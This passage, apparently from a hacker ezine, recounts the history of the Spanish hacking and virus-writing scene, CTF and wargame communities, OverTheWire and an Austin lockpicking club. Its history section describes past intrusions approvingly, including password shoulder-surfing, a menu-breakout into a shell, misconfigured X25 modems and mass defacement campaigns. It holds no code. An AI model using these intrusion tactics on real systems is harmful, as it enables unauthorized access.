machine, that would be lost. If a judge took the ROM and read it, it
wouldn't look in any way like the Apple one. In other words, I didn't
design a BIOS, I encrypted the same one. It was a hack: an interesting
solution to an important problem."

In 1978 Lozano created the first personal computer user club in Spain
Apple II, Commodore Pet and Radio Shack's TRS-80). The club reached 100
members and in 1985 Lozano made a BBS out of it.

Mave or Lester the Teacher were part of the generation following Lozano,
when there was sufficient critical mass to talk of a hacker community.
Many started out as crackers, among them the mythical Zaragoza duo of
Super Rata Software & AWD, active from 1983 to 1986 and addicted to de
protecting (cracking) games. They already had a rudimentary hacker ethic:
their work had to be copyable using the ZX-Spectrum copy program Copion by
Arguello, one that everyone had, was easy to copy and easy to find.
Alternatively the games would autocopy using a key combo.

However, AWD, as many others, left the cracking scene for the hacking one,
obtained a modem and changed his handle to Depeche Mode. He joined
HorseRide, Han Solo and Alf and together they created the first Spanish
hacking group, active between 1987 and 1989. It was called Glaucoma, like
the illness that attacks the eyes iris, a reference to their main hobby:
penetrating RedIRIS (Iris-net), the Spanish university network, from where
they would jump onto international X25 networks.

It is still remembered how Glaucoma managed to get the password that gave
access to the Telefonica X25 nodes (or PADS) in Spain: HorseRide and Han
Solo, who were in their early twenties, passed off as sales rep for an
English company selling shared mainframe time and wanted to buy X25
accounts. When Telefonica did a demo, they memorized the password as the
technician repeatedly entered it: ORTSAC, the reversed last name of the
engineer that had set them up (CASTRO).




2. X25 Hackers

Depeche Mode met The Phreaker through the Minitel chat called QSD, a hub
for European hackers. The Phreaker was Catalan and wrote comm programs for
modems, such as COMS4, which in 1988 were used worldwide. His are the blue
box for MX BB.BAS, the exploit for Linux imapd.c, NePED -one of the first
IDS, resulting from a bet after a few too many beers-, and QueSO
("cheese"), which remotely determined OS's and on which Nmap was based (2).

The Phreaker created QueSO in 1996, when under the alias of Savage he
helped the Portuguese group ToXyN in the first campaign of systematic
attacks in the history of hacktivism against the government of Indonesia
in favour of the independence of East Timor. The campaign consisted in
assaulting and defacing the largest possible amount of Indonesian
governmental and corporate systems. Savage contributed creating exploits
and other purpose created tools such as QueSo.

Savage: "We set up search scripts for all .id domains. For each one found,
we'd look for the machines hosting www ftp mail and news and tried to
attack all four. We set off as many automated attacks as we could. When
we'd get a positive hit, we'd finish it off manually. We owned thousands
of machines. When you have a working exploit and nobody knows the
vulnerability, it's really easy."

In the end, Indonesia recognized East Timor and QueSO became a weapon for
peace: the Internet Operating System Counter project used it to produce a
monthly report on the OS's of European computers connected to the
Internet, including Israel. The promoter of IOSC was a German who ran
QueSO from a machine in USA maintained by Lebanese, called beirut.leb.net
. There was a curious conflict when two Israeli security companies
reported that Israeli machines were being attacked from a Lebanese site.
The news media exaggerated the event and IOSC ended up shutting down.

Returning to 1989, The Phreaker and Depeche joined El Maestro and Petavax
to form the group Apostols. Later on they would be joined by Sir Lancelot
and Ender Wiggins, who in 1987 wrote the first book in Spanish about
hacking and phreaking: "Manual del novicio al hack/phreack" [The novices
manual to hack/phreak] (3). Ender offered the Apostols his ample knowledge
about phreaking in exchange for something he didn't know: why the American
blue-boxes didn't work in Spain.

Apostols: "We figured it out together, spending a ton of money calling
each other. It was thanks to some high voice-pitched ladies in the Girona
area who when answering the phone saying "digui" (hello), the tone was so
high that it was hitting 2,500Hz and cutting the link. Someone from
Telefonica told us and from there it dawned on us: Heck, it's Sokotel!
Sokotel was a type of link with in-band signalling. The US was signalling
in 2,600Hz, which we had tried thousands of times and it didn't work in
Spain".

Phreaking was essential to reach BBS's and X25 networks, the natural field
of action. As the European and USA X25 networks were linked, hacking
sessions would generally extend beyond the ocean. The main port of entry
for USA networks was the MITRE system, from a provider for the US Army.
MITRE would gain fame from the book "The Cuckoo's Egg" by Stiff Stoll,
which recounts how hackers from CCC (Chaos Computer Club) used it to steal
corporate secrets from USA and sell them to the KGB:

The Phreaker: "MITRE was well connected to all the active networks back
then. There was an entry menu to access a phone directory service which
you could break out with the sequence CTRL-Y **Interrupt**. If you did it
right, the menu would abort and drop you in a shell from where you could
connect anywhere. It was known nearly worldwide and for years all the
hackers would go in through there."

"US X25 entry nodes/PADS were incorrectly configured. If you went in
through the back, you had a modem to connect wherever you wanted
worldwide. You only needed a list of nodes, which was easy to get: you'd
go into a US university, check who's connected and you'd get a list with
the identification number of the network entry port that he had used. If
you'd connect to that number when the user was no longer online, some
operators had it pretty badly configured and with little effort (AT OK)
you'd have the modem right there. Lists of accounts that everyone knew
were circulating, one of them RMS belonging to Richard Stallman, on an MIT
system, with no password."

Another source of entertainment for Spanish hackers was to run and
maintain their own BBS and visit those of their friends. Among the most
notorious were Public NME, God's House, Jurassic Park, MSX-Access,
VampireBBS or Waikiki Island. Ender Wiggins even had the gall to open a
hacker BBS (4) at the newspaper where he worked as the IT guy, taking
advantage of the foreign journalists phone line. As a side note, Wiggins
landed this job thanks to his expert knowledge of VMS, obtained hacking
VAXes. On his first day at work he came across a problem: he didn't know
how to turn it on! He had never physically accessed one.


3. 29A "I am the scene"

The Galician BBS Dark Node would become the most famous BBS, breeding
ground for 29A, the most internationally known Spanish group. Respected
virus authors worldwide were part of 29A during its 13 year run from 1995
to 2008: Mister Sandman (es), Anibal Lecter (es), AVV (es), Blade Runner
(es), Gordon Shumway (es), Griyo (es), Leugim San (es), Mr. White (es),
Tcp (es), The Slug (es), VirusBuster (es), Wintermute (es), Darkman, Jacky
Qwerty, Rajaat, Reptile, Super (es), Vecna, Mental Driller (es), SoPinky,
Z0mbie, Benny, Bumblebee (es), LethalMind, Lord Julus, Prizzy, Mandragore,
Ratter, roy g biv and Vallez (es).

Amongst their always original creations stood out the first virus for WinNT
/Win95/Win32s (Cabanas/Jacky Qwerty), and for 64 bits (Rugrat/roy g biv),
the first multiplatform (Esperanto/MrSandman), the first reverse executing
(Tupac Amaru/Wintermute), the first for Windows 2000 and Windows 98 (
appearing prior to the public launch of those OS's, the first that ran
under Linux and Windows (Winux/Benny), the first 32 bit polymorphic (
Marburg/GriYo), the first PHP trojan (Pirus/MaskBits as colaborator), the
first virus to infect PDA's (Dust/Ratter) the first for mobile phones (
Cabir/Vallez) or the first anti-ETA hacktivist virus (GriYo) and Tuareg (
MentalDriller).

Marburg, the first 32 bit polymorphic virus, saw the light in October of
1997 after a bitter discussion on alt.comp.virus between 29A members and
the antivirus industry. 29A was criticizing the industry for false
advertising, as their products could not detect 100% of virus, to which
the industry responded with taunts. Following this, GriYo created Marburg
which none of the existing antivirus could detect. Somehow Marburg ended
up on the free CD's that came with the magazines "PCGamer" and "PC Power
Play", and on the MGM/Wargames game CD. Marburg spread throughout the
world like wildfire.

As 29A was an international group, so were its meet-ups which would last
for days and days. They spent a month in Amsterdam, in Brno a few weeks. A
nice and well loved Belgium female follower, Gigabyte, went to the latter
one, who was so young that she travelled with her cheerful grandfather.

Bernardo Quintero: "I went to a 29A meetup in Madrid. One afternoon we
went to the funfair. While we were queueing up at one of the rides, one of
them was wearing a print of a virus hex-dump on his back, and the two who
were behind him, bored, started to translate it out loud on the run into
assembler and to interpret what it did as if they were reading a book... I
was amazed (any normal human being, including myself as someone
knowledgable in that field, needed a computer, a disassembler and to spend
a while to do something like that)."

The long lifespan of 29A had it witness in first person the decadence and
criminalization of the whole virus scene, a decadence which would also
apply to the whole hacking scenario.

Benny, in 29A ezine, 2002: "The whole scene and many things in it will no
longer be the way it was. Some programmers talk of "death", "decadence",
some talk of serious problems. (...) Script kiddies and their so called
"virus/worms" rule in cyberworld. (...) Antivirus earn money off people
whose stupidity is 99.99% responsible for vast virus outbreaks ("click
here" viruses). Where are those elite programmers, those elite groups?
Where are those hi-tech viruses that *yesterday* dominated the world?
*Decadence*".


4. The community

However, prior to the decadence, the latter half of the 90's had a
bubbling fertile and noisy community, proud heirs of the pioneers, meeting
in newgroups such as es.comp.hackers, mailing lists such as hacking or
hackindex, the IRC-Hispano chat group and ezines such as Raregazz,
NetSearch, 7a69ezine, Cyberhack, CatHack, JJF Hackers Team or Virtual Zone
Magazine. This breeding ground would give fruits in the form of tools that
are still useful today such as Halberd (rwxrwxrwx), OSSIM (Ulandron),
RKdetector (aT4r) or Unhide (Icehouse).

The appearance of scores of newbie hackers showing up at the end of the
90's on the Spanish Internet is due to Infovía, the low cost phone network
set up by Telefonica to access the Internet at local calling rates. This
multiplied the number of ISP's, who practically gave away access, and the
amount of internauts grew exponentially.

Heading this small horde of apprentices were two veteran rival groups:
!Hispahack from Catalonia and Saqueadores from Murcia. The former started
in 1992 and their high technical level was apparent through the tools
created and distributed by their members: SMBScanner (Flow), ICMPush (
Slayer), HTTPush (JFS) or Yersinia (Tomac and Slayer). Amongst their
multiple feats, hacking forum.phrack.org with a PHP exploit in 2000.

Unfortunately !Hispahack will not be remembered so much for their high
level but for a police raid transformed into media circus in 1998 which
ended up with one of its members, JFS, going on trial. His two seized
computers produced password files allegedly stolen off machines from all
over the world, from Thailand to Kiev, passing through Sweden, Canada,
Australia, Germany or the European Organization for Nuclear Research (
CERN). A total of 9,459 accounts. In the end he was absolved due to
inconsistencies in the proof presented.

As for Saqueadores, they stood out due to the ezine of same name, born in
1996, the longest running of the Spanish arena. Some of the notable hacks
of the time were narrated inside, such as when the editor of the ezine in
1997, Paseante, took control of Infovía (5), or when he obtained control
of another sister, also owned by Telefonica, that controlled important
networks of companies and institutions, amongst them the Iberia airline,
the parliamentary congress, or Caja Madrid (a bank).

Saqueadores is also credited with organizing the first hacking convention
in Spain: the UnderCon (1997-2004), a private event with 30 to 60
participants, depending on the edition, precursor of many conventions that
are currently held throughout the country.

Homs: "There were a lot of people interested in phreaking and hardware
hacking, hacking lifts, foosballs, phone booths, the hotel pbx, etc. At
night the people would gather according to their interests and you'd see
phreakers in booths with crocodile clips or metal plates, hackers who
would stay "working" in the hotel rooms, others scanning RF frequencies,
others just hanging out and partying (ending up getting call-girls and
talking about hacking with them, or loosing a chicken in a taxi...), etc."

From 2000 onwards, when the scene had reached its climax and little by
little the decadence was taking root, a new generation of hackers gained
strength, more transversal due to the groups they belonged to and more
collaborative from an international point of view. Amongst them Zhodiac
from !Hispahack stands out as author of EMET and multiple exploits (6). He
published an article in Phrack in 2001 about overflows in PA-RISC, which
opened the gates for others who would also publish there: Pluf and Ripe,
Ilo, Dreg and Shearer, Pancake and Blackngel.

They also created notable exploits, as Doing(7)(8) and RomanSoft(9)(10),
well known for having written, in 1997, the most downloaded text of the
Spanish underground "Tácticas de guerra en el IRC" (War tactics in IRC).
RomanSoft is today a member of Int3pids, one of the 20 best CTF teams in
the world, and of the group !dsR, who in 2004 managed the epic feat of
hacking the actual Chaos Computer Club (11) (12). Taking advantage of a 0-
day exploit in the CCC wiki, they obtained the 2003 congress participants
list, which they published.

Alejandro Ramos: "Hans Ulrich, from the CCC, after doing some forensics on
the systems announced the vulnerability, attributing it to himself. It
wasn't until then that RomanSoft reacted and explained that he had
discovered the exploit a few months before and spread it to a small group
of people from where it had filtered. Even the author of Twiki himself
confirmed that Román had notified him of the vulnerability a few days
prior".

As a final note, the numerous and always collaborative Spanish cracking
community deserves mention, very active on both sides of the ocean.
Spanish crackers from the 90's created a multitude of refuges and a
cathedral called "La Página de Karpoff" (Karpoff's page), where hundreds
of translations, tools and manuals in Spanish about cracking, reverse
engineering and computer programming were uploaded. This fountain of
knowledge watered today's fertile community of Spanish reversers, amongst
them Rubén Santamarta (reversemode), Joxean Koret (matalaz), Ero Carrera,
Hugo Teso, Mario Ballano or Sergi Àlvarez (trufae), the creator of
Radare.


(1) http://www.netcomunity.com/lestertheteacher/index.htm
(2) https://nmap.org/nmap-fingerprinting-old.html
(3) http://hackstory.net/Manual_del_novicio_al_hacking
(4) https://www.youtube.com/watch?v=jXmAzeMoZNs
(5) http://set-ezine.org/ezines/set/txt/set11.zip
(6) http://zhodiac.hispahack.com/index.php?section=advisories
(7) http://examples.oreilly.com/networksa/tools/rpc-statd.c
(8) http://www.vfocus.net/hack/exploits/os/linux/suse/6.2/su-dtors.c
(9) http://examples.oreilly.com/networksa/tools/rs_iis.c
(10) http://archives.neohapsis.com/archives/fulldisclosure/2006-07/
     0234.html
(11) http://www.digitalsec.net/stuff/fun/CCC/camp-server-hack.htm
(12) http://www.digitalsec.net/stuff/fun/CCC/ccc_and_cccs.txt


5. Thanks to:

Dreg, Homs, Zhodiac, HorseRide, Han Solo, Depeche, Rampa, Savage,
Partyman, Lester, Mave, Darkraver, RomanSoft, X-Grimator, Karpoff,
Pepelux, JFS, Alberto Lozano, VirusBuster, rwxrwxrwx, aT4r, Crg, TaNiS,
MindTwist, uCaLu, MegadetH, Pancake, Crash, Metalslug, Angeloso, Nico,
dAb, Snickers, Rayita, Yandros, Icehouse, DrSlump, Deese, L, Altair,
thEpOpE, Belky, El-Brujo, ReYDeS, Bernardo Quintero, Carlos Sánchez
Almeida, Manoleet, Cyteck, Yoriell, Mónica Lameiro, Jay Govind, Rock
Neurotiko, Albert StateX and the rest of the Hackstory's crew. Also:
Jericho. Wau Holland.


|=[ 0x02 ]=---=[ Wargaming Scene Phile - Steven, adc & weekend ]=--------=|


--[ An Overview of the Wargaming Scene Through the Eyes of adc

In 2007, 3 dudes captured the first slot in the DEFCON CTF Qualifiers.
They didn't come from anywhere, and they werent actually planning on
playing, which is why they had to decline. The only explanation is
wargames. So if you eat your veggies and do loads and loads of wargames
you too will have brains, discipline, and hilarity.

And the wargame scene has bloomed! There are CTFs available just about
every month now, many of which can be played remotely. And persistent
shell-based wargames and web-vuln sites continue to run, year after year,
completely free.

Here's why I love wargames:
- The people attached to the keyboards on the other side
- Easy, piecemeal, bite-sized levels
- Decent learning curve on most games (easy to HARD)
- Easy to discipline yourself into a hacking machine
- Good ego-boost after trying to hack unsolved things gets you down
  (see: real world)
- Friendly help readily available
- Knowledge itself is the reward, pure skill!
- Some people cheat, and those that do don't get much of anything out of it
- Cheating is more fun when noone knows how you cheated
- Adrenaline rush (though it's faded for me and others with great time)

I became addicted to wargames.unix.se in 2003. Before the summer, I had
been trying a website my friend showed me, hackerslab, but didn't really
get anywhere after copy pasting my way to somewhere not very far. The
swedish site was started by norse and had lots of other people
participating and making games, a bunch of which are still not far from
wargames today.

At wargames.unix.se something special happened for me though, it all
just really clicked. Perhaps it was the web design or maybe the slogan:
"Unregulated knowledge is pornography". There was just tons of cool
information being discussed in the forums and on irc, things people
wondered about, highly technical, and those people were exploring them
full-on. I think it really was the community. A bunch of charming and
cool swedes were making fun, addictive wargames to play. The attitude
there was A+, the challenges were good, and something about the way
they were presented just made them very appealing. It could have been the
scoreboard, or just listening in on the irc and thinking damn, these are
some genuine hackers. And people were very polite and helpful. Some of
those early games can still be played on overthewire.org:

Leviathan - this was the first shell based game, where all newbies start
Behemoth - where I exploited my first buffer overflow
Utumno - A little harder
Maze - Harder again, easy remotes

There used to be a bunch of other games on wargames.unix.se, some that
taught network skills, and then some that did crypto from easy (balthasar)
to hard (halls of despair) to insane (halls of torment).

The four shell-based games above I would highly recommend to anyone just
starting out. They are just easy enough that it's welcoming to a beginner
but after leviathan the esoterism begins to seep through and make the
levels something else altogether. They're fun and captivating to this
day.

The thing of it is, I used to actually get a huge adrenaline rush from
solving these back then. Like my heart would be pounding while I was
waiting for some shellcode to land, and when it did, it was always a
great smile. After spending an evening to a week or two miserably stuck,
taking copious notes, and then finally solving a level, I couldn't wait
to be working my way up to the next one. It was really damn addictive.
Oddly enough, real-world hacks rarely got close to the rush from wargames
for me, as the real world has lots of complications which my biology
begins to think about.... I'm weird.

Many wargamers also keep copious notes in order to capture the subtleties
of the different game levels. The notes directories usually begin only
with the credentials for each level, but as most wargamers find, the notes
directory tends to escalate. It contains for each level of each game: which
vulnerabilities have been identified, which exploits might work, which
exploits failed, and finally which exploits succeeded. It's also a good
idea to keep notes on different shellcodes, different techniques for
debugging, heap tricks, and so on. I would probably learn a ton from the
disclosure of other people's notes :-).

wargames.unix.se transformed into Digital Evolution dievo.org and was
around until '06 or so. Digital Evolution was quite awesome. It had
basically everything I use from the internet still today: wargames, a
chill music station (delphium radio!), an awesome picture gallery from the
userbase, an extensive archive of links to knowledge, irc!!!, and
leaderboards to compete about everything on the website.

In '06 or so at some point the community dispersed after the demands of
running the site became too great for the people running it and the site
leaders just kind of moved on after a lot of downtime.  runixd offered to
host the games and intruded.net came up. I helped restore and retest a
bunch of them. It seems like ages ago, but I remember administering the
games on user-mode-linux, then Xen (and finding tons of ways to kernel
panic), and finally Vserver. We stopped updating the games around '07,
and it turns out turns of privesc vulns were being introduced to the
kernel and libc in late '07 and '08, heh, so the games didn't need
too much maintenance for awhile. Till some hardware failed quite poorly in
early '11. Luckily, overthewire.org has taken everything back up in '12
and continues to host them

So tempting to namedrop some greetz here to all the nick, but archive.org
really says it best!.
http://web.archive.org/web/20050729112313/http://www.dievo.org/
So what's around today if you're looking to get yet-better at memory
corruption when CTFs are not around? I highly recommend two oldies, which
I consider transformative in my exploitation education. The first of
these is vortex on overthewire.org, the second is #io on smashthestack.org.

When I first played vortex, the first level showed me that I did not really
understand pointers as well as I thought I did. I recall andrewg telling
me to draw a stack diagaram. So I did, and finally the &s and *s made
sense when combined with my diagram and the assembly code. It was mind
bendingly difficult for something quite simple the first time through. And
other levels repeat the experience. Subtly exploitable bugs that at first
don't appear to be possible because of certain limitatio yns. The level of
difficulty does continue to grow until at some point you become somewhat
skilled.

When showing up to play #io, the first time through, I got to 11 and was
utterly disappointed until then. And then something happens, the levels
become hard. Quite hard. I had been a wargame veteran at this point, so
#io was a gift! Today, the first 10 have been rewritten to all be fun.
Now up to about 30 levels, #io continues to grow with well-researched,
subtle vulnerabilities for exploitation. At least one level has a real
world, remotely exploitable vulnerability found by a player and crafted
into a challenge for your intellectual pleasure. Beat #vortex and #io and
you will be rather _good_ at exploiting unix memory corruption.

After that, go play them all. Play every wargame. They all contain
knowledge that will enhance your skills. Also play CTFs when you can and
if they're fun! If they're not as fun or getting stale, then hack the
game!

- adc

old rant:
When I was younger I was aggressive and persistent, probably still so.
Wargames were the perfect outlet to mold my energy into some pretty useful
tricks. I remember coming and going back to wargames many times, the same
challenges continually kicking my ass. I started out as a google copy
pasta chef. I didn't know how to code very well, though I remember checking
out a copy of Turbo C once when I was 12, then a C++ book from the store
when I was 13, and being bored while attempting to learn something from it.
I still hate C++, I think that Bjarne Stroutsups overgrown haircut explains
it all.

I have always, always kept coming back to really play with the machine
though. I want to watch it tick and take it apart. I think I always had
the itch when peering into a screen.

I started out wargaming in 2003. From memory, there are some good ones I
remember from that year, there was web stuff like try2hack.nl,
hackthissite.org, and C stuff like hackerslab (a korean site),
pulltheplug.com (now overthewire.org), and wargames.unix.se (a swedish
site which later became dievo.org). I remember not really knowing my way
around a command shell after cheating on some of the hackerslab levels.
Then one day, a friendly hacker started talking to me through my bash
shell. I had no idea how he did it. Peering up, the difference of skill
level between us was laughable. I wanted to learn :-)

Wargaming in the military is running battle simulations. Wargaming for
computer security is also a simulation. The nice thing about computers is
that they enable very cheap simulations on very real systems. When
wargaming really started to take off in the early 2000s, internet
connections became cheaper as did servers, so it wasn't too much of a
hassle to host something. Though you had to remain careful where you
hosted in case you invited skilled company inside.

Sometimes the systems you're hacking are completely synthetic, which can
be quite tame at times. Sometimes the synthetic game is hackable to
reveal the real game, which is a lot more fun, and I always have more
fun when the real game comes out from the synthetic. For example, I recall
one roothack in 07 or so, eagerly awaiting Epic (RIP) to kick off a 5-way
king of the box game when felinemenace crew ended the game on the gateway
machine before the event had even started. Meanwhile, beist was on my team
had hacked another team's account, and we thought *we* were the ones being
cool...

Those two week lulls before classes would pick up again in high school,
and nothing felt better than procrastinating the binges of assigned
summer reading with some real intellectual stimulation of my own volition.
Landing some code.

Since 07, CTFs have just exploded. I am lucky to have played with the
loller skaterz dropping from rofl copters as well as RPISEC and pick up
teams here and there. One thing that always impressed me about the teams I
encountered was when they *hadnt* played persistent wargames before. You
can have a read of atlas' blog to see what kind of catching up they have
to do. Many CTF players have managed to compress an year's worth of
debugging exploits into a few months, it's impressive.

Here's what I love about wargames. One, it will expand your understanding
of programs and debugging like nothing else can. Many wargame levels will
be little 100-line programs that don't *appear* to have any security
bugs and they will kick your ass for awhile. Others will be obviously
exploitable, until you go and try and exploit them, and find all the
difficulties whether an XSS filter, a NUL byte in the wrong place, or the
compiler reordering stack variables...

Two, there's always a solution* once a challenge is up. Some brilliant
minds thought through and tested something special just for you very
thoroughly to make sure you'd have a good time. Real world code can
REALLY kick your ass and get your self esteem down. It's hard, you can't
always be smarter than the programmers that wrote it. But a wargame level
was made to be broken. It will help you pick up the momentum you need to
tackle the real world again.  *Some CTFs mess up the testing phase which
is disappointing for everyone.

Three, they come in baby steps. The way most persistent wargames and CTFs
are organized is through a potpourri of easy medium hard and random
challenges. Each challenge itself is usually quite manageable and
bite-sized. A well designed game makes it effortless to figure out which
pieces to solve first.  A common strategy among wargame players it to keep
a copious notes with the successes (and sometimes failures) of each level.
I personally logged most of my failed attempts, and always felt great
satisfaction revisiting them. The games provided excellent facilities for
conquering genuinely hard, unknown problems with a lot of research, gdb
(or whatever web stuff for web stuff), and head scratching. Was also
always a joy ;-) to grab a copy of someone's note directory and learn
little tricks.

Four, you will learn real skills. There are skills encoded in the levels of
the games out there that haven't been yet published in an article. I'm
fairly certain #io on smashthestack.org revealed linux ASLR bypasses quite
awhile before they were patched and semi-public. Though many wargames start
out quite easy the difficult ones are there. And it is the difficult ones
that will transform you from a noob into a conscious hacker.

Five, the people. Yes some people are ornery, and if you're vain then you
think I'm talking about you. Some people are trolls. And some people are
just so genuinely cool. Throughout my time in the computer security space,
I am persistently impressed and inspired by people. Both competitively and
creatively, I feel like I've always worked best in pairs or small groups
of people. It's always just a pleasure for me to work with others. And
people of very different backgrounds and goals come to sharpen their skills
on wargames, which means there will be fun.

I remember the first guy I learned to exploit a stack buffer overflow with,
we both had no clue, but we figured it out after a few days of gdbing. This
was on the wargames.unix.se website, which I am EXTREMELY nostalgic for. I
owe Sweden a lot of beers.

Throughout the different wargaming sites and CTFs you will find lots of
different attitudes, some very mysterious people, and some incredibly
ordinary. Back in 2003 when I found wargames.unix.se I knew nothing but
just had a compulsion to solve some levels. I was doing whatever it took
to get to the next one, but I often couldn't figure it out *on my own*.
On wargames.unix.se I found mentorship and just a super inviting attitude
to do the hard stuff. The standard of thinking hard was well-ingrained,
and more impressively, people were just really damn friendly and accepting.
And the reason that is impressive is because I asked *a lot* of dumb
questions. It also had a great scoreboard with green dots that I lived for,
plus the rankings.

I'm pretty sure that I can crash in pads around the world on the promise of
explaining a wargame level to someone.

Steven, I'll race you...

-adc

Wargames: overthewire.org, smashthestack.org, hackthissite.org, try2hack.nl
CTFs: blah blah blah


--[ OverTheWire

OverTheWire.org (OTW for short) is, as far as we are aware, the oldest
hacker wargame community on the internet. The goal of OTW is to learn
security principles and coding practices through a hands-on approach, and
have fun while doing it. The regular OTW community idles on IRC and is very
supportive of new users willing to learn. They answer technical questions
about the games, provide hints and often discuss all kinds of topics
surrounding computer security.

We currently host 11 online games and 3 downloadable images for games that
can be played offline. The topics covered in these games are typically
related to lowlevel security in linux userland (vortex, semtex, leviathan,
narnia, behemoth, utumno, maze, manpage), but we also cover commandline
scripting (bandit), networking (semtex), crypto (krypton), web (natas) and
some kernelland (monxla).

OverTheWire.org was originally called PullThePlug.com, and was created by
Brian Gemberling around 1999. It consisted of 4 physical machines connected
to a network in his basement, behind a cable modem with a single IP.
Through portforwarding, all these machines could be reached from the
internet.

More people joined in the following years and PullThePlug (PTP) grew out of
Brian's basement and into a dedicated hosting enviroment. Now being run by
a core management team and a lot of volunteers, the games existed on 4
physical machines and a bunch of vserver instances.

To avoid a conflict between the PTP games and Brian's business
(ptptech.com), the community moved from PullThePlug.com to PullThePlug.org.
After a dispute over the PullThePlug.org domain name, PullThePlug.org moved
again to OverTheWire.org around 2006.

At this point, most of the old games were gone and replaced by newer games.
Because of all the turbulence caused by moving domain names and problems
with hosting providers and DDoS attacks, development of new games stalled
out. It took a couple years before the server infrastructure got back on
it's tracks. By this time though, a lot of the crew had moved on to other
things.

In 2010, OTW created its first custom wargame for the French Hackito Ergo
Sum (HES) conference and has been doing that annually ever since: HES2010
and abraxas (HES2011) can be downloaded as VM images, while monxla
(HES2012) can be downloaded as a livecd ISO. Kishi, a custom game for 2013,
will be shared by HES and NSC (No Such Conference, also French) and offered
as a download later on.

In 2012, it became apparent that games from intruded.net went offline and
were staying offline. We were asked to adopt these games and, with the help
of their former administrators, managed to resurrect them all 6 on the OTW
servers: leviathan, narnia, behemoth, utumno, maze and manpage. In addition
, 2 games for complete beginners were developed to lower the barrier for
newcomers. Bandit focuses on the very basics of systems security, and natas
covers serverside websecurity.

Because of relentless DDoS attacks on both the OverTheWire.org and
SmashTheStack.org IRC networks, it was decided in 2012 to link both of them
together into one bigger network, reuniting us with our long lost brothers
and sisters.

This is not the end of the story.

We will keep working on developing new games and maintaining the old ones,
for as long as we can. Several new games are already in development,
covering topics such as kernel exploitation, web-security and others.

Many great hackers started out playing, or at some point regularly visited
the PTP/OTW games.
It's an honor to be part of their lives in this way and it is our hope to
continue to provide this kind of hands-on experience to the next generation
of hackers.

Remember, kids: "Experience is what you get, when you don't get what
you want!"

This looks like a good place to thank some people: andrewg, arcanum, astera
,aton, bk, Brian Gemberling, deadbyte, dusty, gizmore, jduck, joernchen,
kripthor, l3thal, malvina, mercy, morla, mxn, nemo, rainer, samy, everyone
else of #social and probably a ton of people who slip my mind right now <3

Go forth, and be a force of the awesome!

|=[ 0x03 ]=---=[ The Austin Lockpicking Scene - jgor ]=---=|


|=----------------------------------------------------------------=|
|=----------------=[ The Austin Lockpicking Scene]=---------------=|
|=------------------------=[ by jgor  ]=--------------------------=|
|=----------------------------------------------------------------=|

The hobbyist lockpicking scene in the U.S. has become wildly organized in
the last decade. If you've been to a hacker conference in that time you've
likely heard the names TOOOL (The Open Organization Of Lockpickers) [0] or
Locksport International [1]. While TOOOL has been going strong in the
Netherlands for far longer, the U.S. branch didn't make an appearance until
the mid-2000's, and Locksport International popped up around the same time
in 2005 as a joint effort between U.S. and Canadian founders.

Enter Doug Farre. An early officer and now president of Locksport
International, Doug came to Austin in early 2006. After his principal put
the kibosh on attempts to start a lockpicking club at his high school in
Houston, and a short-lived group at UT Dallas, he founded the Longhorn
Lockpicking Club [2] at the University of Texas at Austin. This student
organization soon became the flagship chapter of Locksport International.
The club held general meetings on campus each month but core members found
themselves gravitating to the Spider House Cafe & Bar down the street for
weekly informal picking sessions. Not so coincientally, Spider House was
also the location for Austin 2600 [3] at the time.

Longhorn Lockpicking enjoyed great success; with meetings exceeding 50
people in attendance and over 150 registered members in a year it became
one of the largest hobbyist lockpicking groups in the U.S.. DEFCON 16 saw
no less than 5 Longhorn Lockpicking officers on staff in the lockpick
village, bringing with them an epic obstacle course competition involving
picking locks underwater. Doug gave one of the more popular talks at DEFCON
that year as well, "Identification Card Security: Past, Present, Future."
By DEFCON 17 Longhorn Lockpicking officer jgor (yours truly) won the
speedpicking championship, winning a trip to compete at the invitation-only
LockCon in the Netherlands. In the next few years Longhorn Lockpicking went
on to organize or help run lockpick villages and contribute games such as
"Locksport Wizard" and "24 Hours of Locks" to DEFCON, HOPE, and a number of
other hacker conferences.

In 2011 due to lack of volunteers for leadership the Longhorn Lockpicking
Club on campus took a hiatus, officially splintering off a separate group
dubbed L.I-Austin [4] with meetings continuing off-campus. Eventually the
name Longhorn Lockpicking was restored but the club remained unaffiliated
from the university, meeting regularly every other Saturday on the Spider
House patio. As of 2016 they're still going strong and looking forward to
their 10th anniversary in the fall.

In addition to Longhorn Lockpicking, the ATX Hackerspace [5] has held
lockpicking meetings on occasion and has hosted multiple lockpicking
workshops in conjunction with College of Lockpicking [6], an initiative by
Eric Michaud and Jamie Schwettmann which brought lockpicking workshops to
hackerspaces around the U.S.

If you're interested in getting involved in lockpicking check out the
organization websites mentioned above to find a chapter near you, or
resources to start your own chapter.

[0] TOOOL U.S.
    http://toool.us
[1] Locksport International
    http://locksport.com
[2] Longhorn Lockpicking
    http://longhornlockpicking.com
[3] Austin 2600
    http://atx2600.org
[4] L.I Austin
    http://meetup.com/li-austin
[5] ATX Hackerspace
    http://atxhackerspace.org
[6] College of Lockpicking
    http://collegeoflockpicking.com

|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------